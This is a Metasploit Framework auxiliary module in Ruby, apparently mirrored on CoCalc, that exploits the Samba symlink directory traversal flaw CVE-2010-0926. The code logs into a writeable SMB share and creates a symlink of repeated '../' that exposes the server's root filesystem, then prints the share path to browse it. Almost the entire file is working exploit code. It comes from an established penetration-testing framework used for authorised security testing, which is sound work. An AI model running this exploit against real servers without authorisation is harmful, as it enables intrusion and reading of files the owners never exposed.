Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/auxiliary/admin/smb/samba_symlink_traversal.rb
27844 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Auxiliary

7


8
  # Exploit mixins should be called first

9
  include Msf::Exploit::Remote::SMB::Client

10
  include Msf::Auxiliary::Report

11


12
  # Aliases for common classes

13
  SIMPLE = Rex::Proto::SMB::SimpleClient

14
  XCEPT = Rex::Proto::SMB::Exceptions

15
  CONST = Rex::Proto::SMB::Constants

16


17
  def initialize

18
    super(

19
      'Name' => 'Samba Symlink Directory Traversal',

20
      'Description' => %(

21
        This module exploits a directory traversal flaw in the Samba

22
      CIFS server. To exploit this flaw, a writeable share must be specified.

23
      The newly created directory will link to the root filesystem.

24
      ),

25
      'Author' => [

26
        'kcope', # http://lists.grok.org.uk/pipermail/full-disclosure/2010-February/072927.html

27
        'hdm' # metasploit module

28
      ],

29
      'References' => [

30
        ['CVE', '2010-0926'],

31
        ['OSVDB', '62145'],

32
        ['URL', 'http://www.samba.org/samba/news/symlink_attack.html'],

33
        ['ATT&CK', Mitre::Attack::Technique::T1021_002_SMB_WINDOWS_ADMIN_SHARES]

34
      ],

35
      'License' => MSF_LICENSE,

36
      'Notes' => {

37
        'Stability' => [CRASH_SAFE],

38
        'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK],

39
        'Reliability' => []

40
      }

41
    )

42


43
    register_options([

44
      OptString.new('SMBSHARE', [true, 'The name of a writeable share on the server']),

45
      OptString.new('SMBTARGET', [true, 'The name of the directory that should point to the root filesystem', 'rootfs'])

46
    ])

47


48
    deregister_options('SMB::ProtocolVersion')

49
  end

50


51
  def run

52
    print_status('Connecting to the server...')

53
    connect(versions: [1])

54
    smb_login

55


56
    print_status("Trying to mount writeable share '#{datastore['SMBSHARE']}'...")

57
    simple.connect("\\\\#{rhost}\\#{datastore['SMBSHARE']}")

58


59
    print_status("Trying to link '#{datastore['SMBTARGET']}' to the root filesystem...")

60
    simple.client.symlink(datastore['SMBTARGET'], '../' * 10)

61


62
    print_status('Now access the following share to browse the root filesystem:')

63
    print_status("\t\\\\#{rhost}\\#{datastore['SMBSHARE']}\\#{datastore['SMBTARGET']}\\")

64
    print_line('')

65
  end

66
end

67


68